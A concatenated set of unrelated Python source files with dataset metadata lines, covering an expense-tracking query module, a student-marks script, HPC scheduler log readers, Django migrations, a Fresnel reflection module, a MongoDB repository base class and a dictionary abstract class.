'date': expense.date}
elif date_type == 'month':
month = query_date.strftime("%m")
year = query_date.strftime("%Y")
expenses = session.query(Expenses.date, func.sum(Expenses.value))\
.filter(Expenses.date.like('%{}-{}-%'.format(year, month)))\
.group_by(Expenses.date).all()
expense_dict = {}
for expense in expenses:
expense_dict[expense.date] = expense[1]
elif date_type == 'year':
query_year = int(query_date.strftime("%Y"))
expenses = session.query(Expenses).all()
expense_dict = {}
for expense in expenses:
ex_date = datetime.strptime(expense.date, '%Y-%m-%d')
if ex_date.year == query_year:
if ex_date.strftime('%b') in expense_dict.keys():
expense_dict[ex_date.strftime('%b')] = expense_dict[ex_date.strftime('%b')] + expense.value
else:
expense_dict[ex_date.strftime('%b')] = expense.value
return expense_dict
def add_expense(**kwargs):
with session_scope() as session:
expense = Expenses(**kwargs)
session.add(expense)
def del_expense(**kwargs):
expense_id = kwargs['expense_id']
with session_scope() as session:
session.query(Expenses).filter(Expenses.expense_id == expense_id).delete()
def get_next_exp_id():
with session_scope() as session:
expense_id = session.query(func.max(Expenses.expense_id)).one()[0]
if expense_id is None:
expense_id = 1
else:
expense_id = expense_id + 1
return expense_id
def get_borders():
expense_dict = {'MEDay': {'date': '1900-01-01', 'value': 0.0},
'LEDay': {'date': '1900-01-01', 'value': 0.0},
'LEMonth': {'date': '1900-01', 'value': 0.0},
'MEMonth': {'date': '1900-01', 'value': 0.0}
}
with session_scope() as session:
expense = session.query(Expenses.date, func.sum(Expenses.value).label('value_sum'))\
.having(text("value_sum > 0"))\
.group_by(Expenses.date).order_by(desc('value_sum')).first()
if expense is not None:
expense_dict['MEDay'] = {'date': expense[0], 'value': expense[1]}
expense = session.query(Expenses.date, func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by(Expenses.date).order_by('value_sum').first()
if expense is not None:
expense_dict['LEDay'] = {'date': expense[0], 'value': expense[1]}
expense = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('month').order_by('value_sum').first()
if expense is not None:
expense_dict['LEMonth'] = {'date': expense[0], 'value': expense[1]}
expense = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('month').order_by(desc('value_sum')).first()
if expense is not None:
expense_dict['MEMonth'] = {'date': expense[0], 'value': expense[1]}
return expense_dict
def get_totals(q_date):
query_date = q_date.strftime('%Y-%m-%d')
query_month = query_date[0:7]
query_year = query_date[0:4]
totals = {'day': 0.0, 'month': 0.0, 'year': 0.0}
with session_scope() as session:
day_total = session.query(func.sum(Expenses.value)) \
.filter(Expenses.date == query_date).group_by(Expenses.date).first()
if day_total is not None:
totals['day'] = day_total[0]
month_query = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.group_by('month')
month_subquery = month_query.subquery()
month_total = session.query(month_subquery.c.value_sum)\
.filter(month_subquery.c.month == query_month).first()
if month_total is not None:
totals['month'] = month_total[0]
year_query = session.query(func.substr(Expenses.date, 1, 4).label('year'),
func.sum(Expenses.value).label('value_sum')) \
.group_by('year')
year_subquery = year_query.subquery()
year_total = session.query(year_subquery.c.value_sum)\
.filter(year_subquery.c.year == query_year).first()
if year_total is not None:
totals['year'] = year_total[0]
return totals
def get_avgs():
expense_dict = {}
with session_scope() as session:
expense_query = session.query(Expenses.date, func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by(Expenses.date).subquery()
expense = session.query(func.avg(expense_query.c.value_sum)).first()
if expense[0] is not None:
expense_dict['day_avg'] = expense[0]
else:
expense_dict['day_avg'] = 0.0
expense_query = session.query(func.substr(Expenses.date, 1, 7).label('month'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('month').subquery()
expense = session.query(func.avg(expense_query.c.value_sum)).first()
if expense[0] is not None:
expense_dict['month_avg'] = expense[0]
else:
expense_dict['month_avg'] = 0.0
expense_query = session.query(func.substr(Expenses.date, 1, 4).label('year'),
func.sum(Expenses.value).label('value_sum')) \
.having(text("value_sum > 0")) \
.group_by('year').subquery()
expense = session.query(func.avg(expense_query.c.value_sum)).first()
if expense[0] is not None:
expense_dict['year_avg'] = expense[0]
else:
expense_dict['year_avg'] = 0.0
return expense_dict
| 1.90625 | 2 |
DAA_Assi.py | scorpion-11/2D_array_clustering | 0 | 43780 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 3 14:53:06 2019
@author: ISHA
"""
arr = [
[ 'XYZ', 1, 88, 56, 45],
[ 'ABC', 2, 45, 86, 52],
[ 'LMN', 3, 87, 39, 40],
[ 'QWS', 4, 96, 86, 85],
[ 'TRE', 5, 76, 56, 53],
[ 'UTH', 6, 35, 79, 48],
[ 'GHJ', 7, 88, 98, 88],
[ 'DFS', 8, 72, 80, 68],
[ 'CVB', 9, 45, 56, 50],
[ 'PQR', 10, 78, 36, 25]]
sumCol=[]
for i in range(len(arr)):
sumCol.append(0)
#sumCol[len(arr)]
#j = len(arr[0]);
for row in range (0,len(arr)):
# sumCol[row] = 0;
for col in range(2,len(arr[row])):
sumCol[row] = sumCol[row] + arr[row][col]
print("Average marks of all Students of T1, T2, T3 : ",sumCol)
print("Data of Students with greatest cluster are :")
print("- - - - - - - - - - - - - - - - - - - - - -")
print("\ Name \ Roll No \ T1 \ T2 \ T3 ")
print("- - - - - - - - - - - - - - - - - - - - - -")
for i in range(len(arr)):
if sumCol[i]>240:
for j in range(len(arr[i])):
print("\ ",arr[i][j], end='\t')
print()
print("- - - - - - - - - - - - - - - - - - - - - -")
| 2.046875 | 2 |
kronos_modeller/kronos_modeller/logreader/scheduler_reader.py | ecmwf/kronos | 4 | 43908 | # (C) Copyright 1996-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
import csv
import os
from datetime import datetime
from kronos_modeller.kronos_exceptions import ConfigurationError
from kronos_modeller.jobs import IngestedJob, ModelJob
from kronos_modeller.logreader.dataset import IngestedDataSet
def read_pbs_log(filename_in):
pbs_jobs = []
log_list_raw = ['ctime',
'qtime',
'etime',
'end',
'start',
'resources_used.ncpus',
'Resource_List.ncpus',
'resources_used.mem',
'resources_used.cpupercent',
'resources_used.cput',
'group',
'jobname',
'Resource_List.EC_nodes',
'queue'
]
# - standardize the key nemes for different PBS log labels..
log_list = ['time_created',
'time_queued',
'time_eligible',
'time_end',
'time_start',
'ncpus',
'ncpus',
'memory_kb',
'cpu_percent',
'cpu_percent',
'group',
'jobname',
'nnodes',
'queue'
]
# Read file
f_in = open(filename_in, "r")
cc = 1
cce = 0
for line in f_in:
# array got by splitting the line
larray = line.split(" ")
b1_array = larray[1].split(";")
# block E
if (b1_array[1] == "E"):
# init dictionary
line_dict = {}
# user name
user_name = b1_array[3].split("=")[1]
line_dict["user"] = str(user_name)
for jobL in range(0, len(larray)):
yval_val = larray[jobL].split("=")
# print yval_val
if (len(yval_val) == 2):
if yval_val[0] in log_list_raw:
# find index
idx = log_list_raw.index(yval_val[0])
key_name = log_list[idx]
line_dict[key_name] = yval_val[1].strip()
# special case for ARCTUR PBS..
# Resource_List.nodes=1:ppn=1
if yval_val[0] == "Resource_List.nodes":
if len(yval_val[1].split(":")) > 1:
line_dict["nnodes"] = int(yval_val[1].split(":")[0])
if yval_val[1].split(":")[1] == "ppn":
line_dict["ncpus"] = int(yval_val[2]) * int(yval_val[1].split(":")[0])
else:
line_dict["ncpus"] = int(yval_val[1])
i_job = IngestedJob()
# print 'i_job.time_created ', line_dict['time_created']
# print 'i_job.time_queued ', line_dict['time_queued']
# print 'i_job.time_eligible', line_dict['time_eligible']
# print 'i_job.time_end ', line_dict['time_end']
# print 'i_job.time_start ', line_dict['time_start']
# print int(line_dict['ncpus'])
# print line_dict['time_created']
# print type( line_dict['time_created'] )
# print any(c.isalpha() for c in line_dict['time_created'])
# created time
if any([c.isalpha() for c in line_dict['time_created']]):
i_job.time_created = -1
else:
i_job.time_created = int(line_dict['time_created'])
# queue time
if any([c.isalpha() for c in line_dict['time_queued']]):
i_job.time_queued = -1
else:
i_job.time_queued = int(line_dict['time_queued'])
# eligible time
if any([c.isalpha() for c in line_dict['time_eligible']]):
i_job.time_eligible = -1
else:
i_job.time_eligible = int(line_dict['time_eligible'])
# end time
if any([c.isalpha() for c in line_dict['time_end']]):
i_job.time_end = -1
else:
i_job.time_end = int(line_dict['time_end'])
# start time
if any([c.isalpha() for c in line_dict['time_start']]):
i_job.time_start = -1
else:
i_job.time_start = int(line_dict['time_start'])
# average memory
if any([c.isalpha() for c in line_dict['memory_kb'][:-2]]):
i_job.memory_kb = -1
else:
i_job.memory_kb = int(line_dict['memory_kb'][:-2])
if 'ncpus' in line_dict:
i_job.ncpus = int(line_dict['ncpus'])
else:
i_job.ncpus = -1
if 'nnodes' in line_dict:
i_job.nnodes = int(line_dict['nnodes'])
else:
i_job.nnodes = -1
# i_job.cpu_percent = float(line_dict['cpu_percent'].replace(":", ""))
i_job.group = str(line_dict['group'])
i_job.jobname = str(line_dict['jobname'])
i_job.user = str(line_dict['user'])
i_job.queue_type = str(line_dict['queue'])
i_job.cmd_str = None # command line string not available
pbs_jobs.append(i_job)
cce += 1
cc += 1
# remove invalid entries
pbs_jobs[:] = [job for job in pbs_jobs if job.time_start != -1]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_end != -1]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_end >= job.time_start]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_queued != -1]
pbs_jobs[:] = [job for job in pbs_jobs if job.time_start >= job.time_queued]
pbs_jobs[:] = [job for job in pbs_jobs if job.ncpus > 0]
pbs_jobs[:] = [job for job in pbs_jobs if job.nnodes > 0]
for (ii, i_job) in enumerate(pbs_jobs):
i_job.idx_in_log = ii
pbs_jobs.sort(key=lambda x: x.time_start, reverse=False)
# times relative to start of log
min_start_time = min([i_job.time_start for i_job in pbs_jobs])
for i_job in pbs_jobs:
i_job.runtime = float(i_job.time_end) - float(i_job.time_start)
i_job.time_start_0 = i_job.time_start - min_start_time
i_job.time_in_queue = i_job.time_start - i_job.time_queued
return pbs_jobs
def read_accounting_logs(filename_in):
"""
Reads ecmwf accounting logs
:param filename_in:
:return:
"""
accounting_jobs = []
# ['"hpc"',
# '"jobid"',
# '"jobname"',
# '"jobstepid"',
# '"owner_uid"',
# '"owner_group"',
# '"submitter_uid"',
# '"submitter_group"',
# '"queue_time"',
# '"start_time"',
# '"end_time"',
# '"no_nodes"',
# '"no_cpus"',
# '"class"',
# '"account"',
# '"usage"',
# '"sbu"',
# '"step_usertime"',
# '"stdin"',
# '"stdout"',
# '"stderr"',
# '"job_name"']
with open(filename_in, 'rb') as csvfile:
csv_dict = csv.DictReader(csvfile, delimiter=';', quotechar='"')
for line_dict in csv_dict:
i_job = IngestedJob()
try:
i_job.time_queued = (datetime.strptime(line_dict['queue_time'], '%Y-%m-%d %H:%M:%S') -
datetime(1970, 1, 1)).total_seconds()
except ValueError:
i_job.time_queued = (datetime.strptime(line_dict['queue_time'], '%Y-%m-%d %H:%M:%S.%f') -
datetime(1970, 1, 1)).total_seconds()
try:
i_job.time_end = (datetime.strptime(line_dict['end_time'], '%Y-%m-%d %H:%M:%S.%f') -
datetime(1970, 1, 1)).total_seconds()
except ValueError:
i_job.time_end = (datetime.strptime(line_dict['end_time'], '%Y-%m-%d %H:%M:%S') -
datetime(1970, 1, 1)).total_seconds()
try:
i_job.time_start = (datetime.strptime(line_dict['start_time'], '%Y-%m-%d %H:%M:%S.%f') -
datetime(1970, 1, 1)).total_seconds()
except ValueError:
i_job.time_start = (datetime.strptime(line_dict['start_time'], '%Y-%m-%d %H:%M:%S') -
datetime(1970, 1, 1)).total_seconds()
if 'no_cpus' in line_dict:
i_job.ncpus = int(line_dict['no_cpus'])
else:
i_job.ncpus = -1
if 'no_nodes' in line_dict:
i_job.nnodes = int(line_dict['no_nodes'])
else:
i_job.nnodes = -1
if 'stdout' in line_dict:
i_job.stdout = line_dict['stdout']
else:
i_job.stdout = []
# i_job.cpu_percent = float(line_dict['cpu_percent'].replace(":", ""))
i_job.group = str(line_dict['owner_group'])
i_job.jobname = str(line_dict['jobname'])
i_job.user = str(line_dict['owner_uid'])
i_job.queue_type = str(line_dict['class'])
i_job.cmd_str = None # command line string not available
# info not available
i_job.time_created = -1
i_job.time_eligible = -1
i_job.memory_kb = -1
accounting_jobs.append(i_job)
# remove invalid entries
accounting_jobs[:] = [job for job in accounting_jobs if job.time_start != -1]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_end != -1]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_end >= job.time_start]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_queued != -1]
accounting_jobs[:] = [job for job in accounting_jobs if job.time_start >= job.time_queued]
accounting_jobs[:] = [job for job in accounting_jobs if job.ncpus > 0]
accounting_jobs[:] = [job for job in accounting_jobs if job.nnodes > 0]
# store the original idx of each job..
for (ii, i_job) in enumerate(accounting_jobs):
i_job.idx_in_log = ii
accounting_jobs.sort(key=lambda x: x.time_start, reverse=False)
# times relative to start of log
min_start_time = min([i_job.time_start for i_job in accounting_jobs])
for i_job in accounting_jobs:
# print type(i_job.time_queued), type(i_job.time_end), type(i_job.time_start)
i_job.runtime = float(i_job.time_end) - float(i_job.time_start)
i_job.time_start_0 = i_job.time_start - min_start_time
i_job.time_in_queue = i_job.time_start - i_job.time_queued
return accounting_jobs
def read_epcc_csv_logs(filename_in):
""" read CSV logs from EPCC.. """
csv_jobs = []
with open(filename_in, 'rb') as csvfile:
csv_dict = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for line_dict in csv_dict:
i_job = IngestedJob()
# if isinstance(line_dict['ctime'], str):
# # i_job.time_queued = int(line_dict['ctime'])
# i_job.time_queued = int(line_dict['start']) + 999 # will be removed later..
# else:
# print "line_dict['ctime']: ", line_dict['ctime']
# i_job.time_queued = int(line_dict['start']) + 999 # will be removed later..
try:
i_job.time_queued = int(line_dict['ctime'])
except:
print(("I didn't recognize ctime {0} as a number".format(line_dict['ctime'])))
i_job.time_queued = -1
try:
i_job.time_end = int(line_dict['end'])
except:
print(("I didn't recognize end {0} as a number".format(line_dict['end'])))
i_job.time_end = -1
try:
i_job.time_start = int(line_dict['start'])
except:
print(("I didn't recognize start {0} as a number".format(line_dict['start'])))
i_job.time_start = -1
try:
i_job.ncpus = int(line_dict['ncpus'])
except:
print(("I didn't recognize start {0} as a number".format(line_dict['ncpus'])))
i_job.ncpus = -1
try:
i_job.nnodes = int(line_dict['node_count'])
except:
print(("I didn't recognize start {0} as a number".format(line_dict['node_count'])))
i_job.nnodes = -1
# i_job.group = line_dict['group'].strip()
i_job.group = ''
if line_dict['jobname']:
i_job.jobname = line_dict['jobname'].strip()
else:
i_job.jobname = ''
if line_dict['jobname']:
i_job.user = line_dict['UserID'].strip()
else:
i_job.user = ''
if line_dict['jobname']:
i_job.queue_type = line_dict['queue'].strip()
else:
i_job.queue_type = ''
# info not available
i_job.time_created = -1
i_job.time_eligible = -1
i_job.memory_kb = -1
i_job.cmd_str = None # command line string not available
csv_jobs.append(i_job)
# remove invalid entries
csv_jobs[:] = [job for job in csv_jobs if job.time_start != -1]
csv_jobs[:] = [job for job in csv_jobs if job.time_end != -1]
csv_jobs[:] = [job for job in csv_jobs if job.time_end >= job.time_start]
csv_jobs[:] = [job for job in csv_jobs if job.time_queued != -1]
csv_jobs[:] = [job for job in csv_jobs if job.time_start >= job.time_queued]
csv_jobs[:] = [job for job in csv_jobs if job.ncpus > 0]
csv_jobs[:] = [job for job in csv_jobs if job.nnodes > 0]
# store the original idx of each job..
for (ii, i_job) in enumerate(csv_jobs):
i_job.idx_in_log = ii
csv_jobs.sort(key=lambda x: x.time_start, reverse=False)
# times relative to start of log
min_start_time = min([i_job.time_start for i_job in csv_jobs])
for i_job in csv_jobs:
# print type(i_job.time_queued), type(i_job.time_end), type(i_job.time_start)
i_job.runtime = float(i_job.time_end) - float(i_job.time_start)
i_job.time_start_0 = i_job.time_start - min_start_time
i_job.time_in_queue = i_job.time_start - i_job.time_queued
return csv_jobs
class PBSDataSet(IngestedDataSet):
def __init__(self, joblist, *args, **kwargs):
super(PBSDataSet, self).__init__(joblist, '.', {'cache':False})
# The created times are all in seconds since an arbitrary reference, so we want to get
# them relative to a zero-time
created_time_list = [j.time_created for j in self.joblist if j.time_created >= 0]
self.global_created_time = 0.0
if created_time_list:
self.global_created_time = min(created_time_list)
start_time_list = [j.time_created for j in self.joblist if j.time_created >= 0]
self.global_start_time = 0.0
if start_time_list:
self.global_start_time = min(start_time_list)
def model_jobs(self):
for job in self.joblist:
# assert isinstance(job, IngestedJob)
assert not job.timesignals
# if job.time_created >= 0:
# submit_time = job.time_created - self.global_created_time
# else:
# submit_time = job.time_start - self.global_start_time
yield ModelJob(
job_name=job.jobname,
user_name=job.user,
cmd_str=job.cmd_str,
queue_name=job.queue_type,
time_queued=job.time_queued,
time_start=job.time_start,
duration=job.time_end-job.time_start,
ncpus=job.ncpus,
nnodes=job.nnodes,
stdout=job.stdout,
label=None,
)
def ingest_pbs_logs(path, cfg=None):
"""
Read PBS logs into a dataset
"""
if not os.path.exists(path):
raise ConfigurationError("Specified path to ingest PBS profiles does not exist: {}".format(path))
if not os.path.isfile(path):
raise ConfigurationError("Specified path for PBS time_schedule is not a file")
jobs = read_pbs_log(path)
return PBSDataSet(jobs)
def ingest_epcc_csv_logs(path, cfg=None):
"""
Read PBS logs into a dataset
"""
if not os.path.exists(path):
raise ConfigurationError("Specified path to ingest CSV profiles does not exist: {}".format(path))
if not os.path.isfile(path):
raise ConfigurationError("Specified path for CSV time_schedule is not a file")
jobs = read_epcc_csv_logs(path)
return PBSDataSet(jobs)
class AccountingDataSet(IngestedDataSet):
def __init__(self, joblist, *args, **kwargs):
super(AccountingDataSet, self).__init__(joblist, '.', {'cache':False})
# The created times are all in seconds since an arbitrary reference, so we want to get
# them relative to a zero-time
self.global_start_time = min((j.time_start for j in self.joblist if j.time_start >= 0))
def model_jobs(self):
for job in self.joblist:
assert isinstance(job, IngestedJob)
assert not job.timesignals
# yield ModelJob(
# time_start=job.time_start - self.global_start_time,
# duration=job.time_end-job.time_start,
# ncpus=job.ncpus,
# nnodes=job.nnodes,
# scheduler_timing=job.time_queued,
# stdout=job.stdout
# )
yield ModelJob(
job_name=job.jobname,
user_name=job.user,
cmd_str=job.cmd_str,
queue_name=job.queue_type,
time_queued=job.time_queued,
time_start=job.time_start,
duration=job.time_end - job.time_start,
ncpus=job.ncpus,
nnodes=job.nnodes,
scheduler_timing=job.time_queued,
stdout=job.stdout,
label=None,
)
def ingest_accounting_logs(path, cfg=None):
"""
Read PBS logs into a dataset
"""
if not os.path.exists(path):
raise ConfigurationError("Specified path to ingest accounting profiles does not exist: {}".format(path))
if not os.path.isfile(path):
raise ConfigurationError("Specified path for accounting log is not a file")
jobs = read_accounting_logs(path)
return PBSDataSet(jobs)
| 1.570313 | 2 |
course_selection/migrations/0021_auto_20150905_0817.py | PrincetonUSG/ReCal | 13 | 44036 | <filename>course_selection/migrations/0021_auto_20150905_0817.py<gh_stars>10-100
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('course_selection', '0020_auto_20150903_0501'),
]
operations = [
migrations.RemoveField(
model_name='friend_request',
name='accepted',
),
migrations.AddField(
model_name='friend_request',
name='status',
field=models.CharField(default=b'PEN', max_length=3, choices=[(b'PEN', b'Pending'), (b'ACC', b'Accepted'), (b'REJ', b'Rejected')]),
preserve_default=True,
),
]
| 0.871094 | 1 |
ana/fresnel.py | hanswenzel/opticks | 11 | 44164 | <filename>ana/fresnel.py
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
fresnel.py : analytic reflection expectations
==================================================
"""
import os, logging
log = logging.getLogger(__name__)
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from opticks.ana.base import opticks_environment
from opticks.ana.nbase import count_unique
np.set_printoptions(suppress=True, precision=3)
def fresnel(x, n1, n2, spol=True):
"""
https://en.wikipedia.org/wiki/Fresnel_equations
"""
cx = np.cos(x)
sx = np.sin(x)
disc = 1. - np.square(n1*sx/n2)
qdisc = np.sqrt(disc)
pass
if spol:
num = (n1*cx - n2*qdisc)
den = (n1*cx + n2*qdisc)
else:
num = (n1*qdisc - n2*cx)
den = (n1*qdisc + n2*cx)
pass
return np.square(num/den)
def fresnel_factor(seqhis, i, n1, n2, spol=True):
"""
:param seqhis: history sequence string eg "TO BT BR BT SA"
:param n1: refractive index of initial material
:param n2: refractive index of material that is transmitted into
Not aiming for generality, only works for simple geometries like raindrops, prisms, lens
"""
seqs = seqhis.split(" ")
rx = fresnel(i, n1, n2, spol=spol )
tx = 1 - rx
ff = np.ones(len(i))
for step in seqs:
#print step
if step in ("TO", "SA"):continue
if step == "BT":
ff *= tx
elif step == "BR":
ff *= rx
else:
assert 0, step
pass
pass
return ff
def fresnel_s( i, n, method=0):
"""
sin(i-r) si cr - ci sr
-------- = -------------
sin(i+r) si cr + ci sr
This form whilst pretty, gives nan at normal incidence, 0/0
"""
si = np.sin(i)
sr = si/n
if method == 0:
ci = np.sqrt( 1 - si*si )
cr = np.sqrt( 1 - sr*sr )
num = si*cr - ci*sr
den = si*cr + ci*sr
else:
i = np.arcsin(si)
r = np.arcsin(sr)
num = np.sin(i - r)
den = np.sin(i + r)
#log.info("i %s r %s num %s den %s " % (i,r,num,den))
pass
return np.square(num/den)
def fresnel_p( i, n):
"""
tan(i-r)
--------
tan(i+r)
"""
si = np.sin(i)
sr = si/n
i = np.arcsin(si)
r = np.arcsin(sr)
num = np.tan(i - r)
den = np.tan(i + r)
return np.square(num/den)
class Fresnel(object):
def __init__(self, n1, n2, dom=None ):
if dom is None:
dom = np.linspace(0,90,91)
n1 = np.asarray(n1)
n2 = np.asarray(n2)
th = dom*np.pi/180.
spol = fresnel(th, n1, n2, True)
ppol = fresnel(th, n1, n2, False)
pass
self.n1 = n1
self.n2 = n2
self.dom = dom
self.th = th
self.spol_0 = spol
self.ppol_0 = ppol
#self.alternative_check()
self.cen = (dom[:-1] + dom[1:])/2.
# avg of bin edge values
self.spol = (spol[:-1] + spol[1:])/2.
self.ppol = (ppol[:-1] + ppol[1:])/2.
self.upol = (self.spol+self.ppol)/2. # unpol?
self.brewster = np.arctan(n2/n1)*180./np.pi
self.critical = np.arcsin(n1/n2)*180./np.pi
def alternative_check(self):
"""
Alternative angle difference forms, misbehave at normal incidence
Otherwise they match
"""
th = self.th
n1 = self.n1
n2 = self.n2
spol_0 = self.spol_0
ppol_0 = self.ppol_0
spol_2 = fresnel_s( th, n2/n1, method=1)
spol_3 = fresnel_s( th, n2/n1, method=0)
assert np.allclose( spol_0[1:], spol_2[1:] ), np.dstack([spol_0,spol_2, spol_3])
assert np.allclose( spol_0[1:], spol_3[1:] ), np.dstack([spol_0,spol_2, spol_3])
ppol_2 = fresnel_p( th, n2/n1)
assert np.allclose( ppol_0[1:], ppol_2[1:] ), np.dstack([ppol_0, ppol_2])
def __call__(self, xd, n):
x = xd*np.pi/180.
n1 = self.n1
n2 = self.n2
cx = np.cos(x)
sx = np.sin(x)
disc = 1. - np.square(n1*sx/n2)
qdisc = np.sqrt(disc)
pass
spol = np.square((n1*cx - n2*qdisc)/(n1*cx + n2*qdisc))
ppol = np.square((n1*qdisc - n2*cx)/(n1*qdisc + n2*cx))
return n*(spol*f + (1.-f)*ppol)
def pl(self):
plt.plot(self.cen, self.spol, label="S (perp)", c="r")
plt.plot(self.cen, self.ppol, label="P (para)", c="b")
def title(self):
return "Fresnel %4.3f/%4.3f " % (self.n1, self.n2 )
def plot(self, fig, ny=1, nx=1, n=1, log_=False):
plt.title(self.title())
ax = fig.add_subplot(ny,nx,n)
self.pl()
self.angles()
legend = ax.legend(loc='upper left', shadow=True)
if log_:
ax.set_yscale('log')
def angles(self):
a = self.brewster
plt.plot([a, a], [1e-6, 1], 'k-', c="b", lw=2, label="Brewster")
a = self.critical
plt.plot([a, a], [1e-6, 1], 'k-', c="r", lw=2, label="Critical")
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
opticks_environment()
n1 = np.array([1.])
n2 = np.array([1.458])
fr = Fresnel(n1,n2)
fig = plt.figure()
fr.plot(fig, log_=True)
fig.show()
| 1.851563 | 2 |
tests/resources/my_dummy_handlers/dummy_handler_multiple_args_too_few.py | stude1/robotframework-oxygen | 13 | 44292 | <filename>tests/resources/my_dummy_handlers/dummy_handler_multiple_args_too_few.py<gh_stars>10-100
from oxygen import BaseHandler
class MyDummyHandler(BaseHandler):
'''
A test handler that throws mismatch argument exception because
parse_results expects too many arguments
'''
def run_my_dummy_handler(self, result_file):
return result_file, 'foo'
def parse_results(self, result_file, foo, bar):
return {
'name': result_file,
'foo': foo,
'bar': bar
}
| 1.523438 | 2 |
app/core/db.py | oxfn/owtest | 0 | 44420 | <filename>app/core/db.py
import logging
from typing import Iterable, Type
from bson import ObjectId
from fastapi import Depends
from motor.core import AgnosticClient, AgnosticCollection, AgnosticDatabase
from motor.motor_asyncio import AsyncIOMotorClient
from pymongo.results import InsertOneResult
from app.models import IdentityModel
from .settings import Settings, get_settings
logger = logging.getLogger(__name__)
async def get_db(settings: Settings = Depends(get_settings)):
"""Initialize database."""
try:
client: AgnosticClient = AsyncIOMotorClient(settings.mongo_url)
yield client.get_database()
finally:
client.close()
class BaseRepository:
"""Base repository class."""
collection_name: str = ""
model_type: Type[IdentityModel] = IdentityModel
def __init__(self, db: AgnosticDatabase = Depends(get_db, use_cache=True)):
"""Initializer."""
self.col: AgnosticCollection = db[self.collection_name]
def _construct(self, attrs: dict) -> model_type:
"""Construct Pydantic model from Mongo object dict."""
attrs["id"] = str(attrs["_id"])
return self.model_type(**attrs)
def _deconstruct(self, obj: model_type) -> dict:
"""Deconstructs model for Mongo."""
attrs = obj.dict()
if attrs.get("id"):
attrs["_id"] = ObjectId(attrs["id"])
del attrs["id"]
return attrs
async def get(self, **attrs) -> model_type:
"""Get one item."""
db_item: dict = await self.col.find_one(attrs)
return self._construct(db_item) if db_item else None
async def get_all(self, **attrs) -> Iterable[model_type]:
"""Get one item."""
db_items: Iterable[dict] = self.col.find(attrs)
return [self._construct(i) async for i in db_items]
async def create(self, obj: model_type) -> model_type:
"""Create item."""
res: InsertOneResult = await self.col.insert_one(self._deconstruct(obj))
db_item = await self.col.find_one(res.inserted_id)
return self._construct(db_item)
| 1.640625 | 2 |
djangoq_demo/order_reminder/migrations/0001_initial.py | forance/django-q | 0 | 44548 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-17 12:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='orders',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order_id', models.PositiveIntegerField()),
('order_amount', models.DecimalField(decimal_places=2, max_digits=8)),
('customer', models.CharField(max_length=200, null=True, unique=True, verbose_name=b'Company Name')),
('ship_date', models.DateField(help_text=b'Please use the following format: YYYY/MM/DD.', null=True)),
],
),
]
| 0.847656 | 1 |
set_dictionary/abstractdict.py | pinmingkenan/python_structure | 0 | 44676 | # coding = utf-8
from inherit_abstract.abstractcollection import AbstractCollection
class AbstractDict(AbstractCollection):
"""
Common data and method implementations for dictionaries.
"""
def __init__(self, source_collection):
"""
Will copy items to the collection from source_collection if it's present.
"""
AbstractCollection.__init__(self)
if source_collection:
for key, value in source_collection:
self[key] = value
def __str__(self):
return "{" + ", ".join(map(str, self.items())) + "}"
def __and__(self, other):
"""
Returns a new dictionary containing the contents of self adn other.
:param other:
:return:
"""
result = type(self)(map(lambda item: (item.key, item.value), self.items()))
for key in other:
result[key] = other[key]
return result
def __eq__(self, other):
"""
Returns True if self equals other, or False otherwise.
:param other:
:return:
"""
if self is other:
return True
if type(self) != type(other) or len(self) != len(other):
return False
for key in self:
if not key in other:
return False
return True
def keys(self):
"""
Returns a iterator on the keys in the dictionary.
:return:
"""
return iter(self)
def values(self):
"""
Reutrns an iterator on the values in the dictionary.
:return:
"""
return iter(map(lambda key: self[key], self))
def items(self):
"""
Returns an iterator on the items in the dictionary.
:return:
"""
return iter(map(lambda key: Item(key, self[key]), self))
class Item(object):
"""
Represents a dictionary item. Supports comparisons by key.
"""
def __init__(self, key, value):
self.key = key
self.value = value
def __str__(self):
return str(self.key) + ":" + str(self.value)
def __eq__(self, other):
if type(self) != type(other):
return False
return self.key == other.key
def __lt__(self, other):
if type(self) != type(other):
return False
return self.key < other.key
def __le__(self, other):
if type(self) != type(other):
return False
return self.key <= other.key
| 3.296875 | 3 |
daiquiri/metadata/migrations/0025_add_published_updated.py | agy-why/daiquiri | 14 | 44804 | # Generated by Django 2.1.4 on 2019-05-29 11:45
from django.db import migrations, models
